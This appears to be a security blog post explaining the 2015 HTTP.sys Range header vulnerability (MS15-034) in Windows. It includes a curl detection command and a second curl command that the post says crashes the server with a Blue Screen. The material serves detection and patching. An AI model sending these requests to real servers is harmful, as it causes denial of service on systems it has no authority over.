On April 14th, 2015 patch Tuesday, Microsoft released a patch for a remote code execution vulnerability in HTTP.sys module of Windows. The vulnerability affected all versions of windows, ranging from Windows 7 to Windows servers. Microsoft’s bulletin MS15-034 talked about the vulnerability only in brief and left the details to be revealed only by reverse engg the patch. It was a race against time for people to patch their servers and for attackers to reverse engineer the patch to zero-down on the exact vulnerability. The vulnerability was assigned CVE-2015-1635. In this blog we will see what is HTTP.sys is and how to detect the vulnerability. Understandably the fix was to apply Microsoft’s patch.
What is HTTP.sys?
HTTP.sys is a kernel-module which is a HTTP listener. Prior to HTTP.sys, windows used Windows Socket API (Winsock), a user-mode component, to receive HTTP requests. Having HTTP listener in kernel have following advantages :
- Kernel-mode caching: Requests for cached responses are served without switching to user mode.
- Kernel-mode request queuing: Requests cause less overhead in context switching because the kernel forwards requests directly to the correct worker process. If no worker process is available to accept a request, the kernel-mode request queue holds the request until a worker process picks it up.
For more details on working and advantages of HTTP.sys, visit .
The vulnerability exists in the parsing of the Range Header  of the HTTP request sent to the server. By sending Range header’s value as bytes=0-18446744073709551615, triggers a buffer overflow and this can be used as a test to detect HTTP.sys vulnerability on a server.
Following curl command can be used for testing:
$ curl -v www.example.com -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"
If response is “HTTP Error 400. The request has an invalid header name.”, then the server is patched, any other response apart from this indicate the server is still vulnerable.
Sending following request will cause Blue Screen of Death (BSoD) and thus causing Denial-of-Service.
$ curl -v www.example.com/iis-85.png -H "Host: irrelevant" -H "Range: bytes=20-18446744073709551615"
As per comments on Hacker News , the vulnerability affects only those server on which “Output Cache” or “Enable Kernal Caching” is checked.
There is ready to use tool available on Github for testing your server for HTTP.sys vulnerability.
This attack is similar to Range-attack on Apache servers, causing Denial of service .
Keep Hacking :).